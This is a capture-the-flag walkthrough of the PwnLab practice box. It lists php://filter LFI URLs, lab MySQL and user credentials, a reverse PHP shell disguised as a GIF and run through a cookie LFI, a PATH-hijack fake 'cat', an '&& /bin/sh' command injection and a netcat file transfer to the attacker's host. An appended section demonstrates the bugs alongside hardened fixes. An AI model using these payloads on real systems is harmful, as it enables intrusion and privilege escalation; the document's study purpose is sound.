WDavid404 / PG-Box

PG box walkthrough note

PwnLab (easy) ★ #28

Open WDavid404 opened 4 months ago

WDavid404 commented 4 months ago

Keypoints

WDavid404 commented 4 months ago
PORT      STATE    SERVICE        REASON         VERSION
80/tcp    open     http           syn-ack ttl 61 Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: PwnLab Intranet Image Hosting
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS

111/tcp   open     rpcbind        syn-ack ttl 61 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          38918/udp   status
|   100024  1          40272/udp6  status
|   100024  1          57037/tcp6  status
|_  100024  1          57762/tcp   status

3306/tcp  open     mysql          syn-ack ttl 61 MySQL (blocked - too many connection errors)
57762/tcp open     status         syn-ack ttl 61 1 (RPC #100024)

Feroxbuster result --> (screenshot)

Because the 80/tcp web page URL looks like "http://192.168.249.29/?page=login", "/?page" may be vulnerable to an LFI attack --> try LFI... finally, php://filter works.

http://192.168.249.29/?page=php://filter/convert.base64-encode/resource=login --> (screenshot)

http://192.168.249.29/?page=php://filter/convert.base64-encode/resource=config --> (screenshot)

http://192.168.249.29/?page=php://filter/convert.base64-encode/resource=index --> (screenshot) index.php contains include("lang/".$_COOKIE['lang']) --> it reads $_COOKIE['lang']

then,

mysql -h 192.168.249.29 -u root -p'H4u%QJ_H99'
use Users;
show tables;
select * from users;

--> (screenshot)

| user | password (base64) | decoded |
| --- | --- | --- |
| kent | Sld6WHVCSkpOeQ== | JWzXuBJJNy |
| mike | U0lmZHNURW42SQ== | SIfdsTEn6I |
| kane | aVN2NVltMkdSbw== | iSv5Ym2GRo |

Log in to http://192.168.249.29/ and upload a reverse PHP file --> "Not correct extension" (screenshot)

Rename the php file to php.gif and upload again --> got "Error 002"

Try putting GIF format code at the beginning of the php file --> works (screenshot). But didn't find a place to call this file.

According to include("lang/".$_COOKIE['lang']), it reads $_COOKIE['lang'] and uses it as an LFI (screenshot), so we can call our php file with the path and filename ../upload/450619c0f9b99fca3f46d28787bc55c5.gif --> (screenshot)

We got a reverse shell from the target host (screenshot)

Under /home, there are some user folders (screenshot)

Switch to another user with the credential info that we got (screenshot) --> (screenshot) --> created a file named cat in /tmp and added it to $PATH.

cd /tmp
echo /bin/bash > cat
chmod +x cat
export PATH=/tmp:$PATH

run ./msgmike again --> (screenshot)

Transfer the msg2root file to our kali machine (start the listener on kali first):

[kali] nc -lvp 80 > msg2root
mike@pwnlab:/home/mike$ nc -nv 192.168.45.180 80 < msg2root

then, strings msg2root --> (screenshot)

So, run ./msg2root hello && /bin/sh (/bin/bash doesn't work) (screenshot). (Note: we should use /bin/cat because we made a fake cat command that is found first in the PATH env.)
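Editor's added example for the two privilege-escalation steps above (the fake cat in $PATH against msgmike, and the `hello && /bin/sh` argument to msg2root). It is not the box's code: the real binaries are not on this page, so the stand-ins below assume msgmike calls `cat` by bare name and msg2root splices its argument unquoted into a system() command string, which is what the two tricks in the notes rely on. Each bug is shown beside a hardened variant, and the payloads print markers instead of spawning a shell so the result can be checked.

```shell
#!/bin/sh
# Added example, not from the original write-up. Stand-ins for msgmike and
# msg2root are written here from what the notes imply (bare "cat" via PATH;
# argument interpolated into a shell command). Everything lives in a temp dir.
set -u

LAB=$(mktemp -d)
trap 'rm -rf "$LAB"' EXIT
printf 'real file contents\n' > "$LAB/secret.txt"

# --- bug 1: trusting $PATH -----------------------------------------------
# Stand-in for msgmike: "cat" is resolved through the caller's PATH.
cat > "$LAB/msgmike_vuln" <<'EOF'
#!/bin/sh
cat "$1"
EOF
# Hardened: reset PATH to a trusted value and use an absolute path.
cat > "$LAB/msgmike_safe" <<'EOF'
#!/bin/sh
PATH=/usr/bin:/bin; export PATH
/bin/cat "$1"
EOF
# Attacker's fake cat, same idea as "echo /bin/bash > /tmp/cat".
mkdir "$LAB/evil"
cat > "$LAB/evil/cat" <<'EOF'
#!/bin/sh
echo HIJACKED
EOF
chmod +x "$LAB/msgmike_vuln" "$LAB/msgmike_safe" "$LAB/evil/cat"

# Run a msgmike stand-in with the attacker's directory first in PATH
# (equivalent to: export PATH=/tmp:$PATH; ./msgmike).
run_msgmike() {
    PATH="$LAB/evil:$PATH" "$LAB/$1" "$LAB/secret.txt"
}

# --- bug 2: argument spliced into a shell command ------------------------
# Stand-in for msg2root: $1 lands unquoted inside the string given to sh -c,
# which is exactly what sprintf()+system() does in C.
msg2root_vuln() {
    sh -c "/bin/echo $1 >> $LAB/messages.txt"
}
# Hardened: the message is written as data and never re-parsed by a shell
# (in C: execve("/bin/echo", argv, ...) with the message as one argv entry).
msg2root_safe() {
    printf '%s\n' "$1" >> "$LAB/messages_safe.txt"
}
```

Calling `msg2root_vuln 'hello && echo INJECTED'` prints "hello" and runs the second command, which is the same shape as `./msg2root hello && /bin/sh`. The notes' remark that /bin/bash "doesn't work" there is expected behaviour: when bash starts with an effective UID different from the real UID it drops the effective UID unless invoked with `-p`, while dash (/bin/sh on Debian) keeps it, so the setuid root context survives only with /bin/sh.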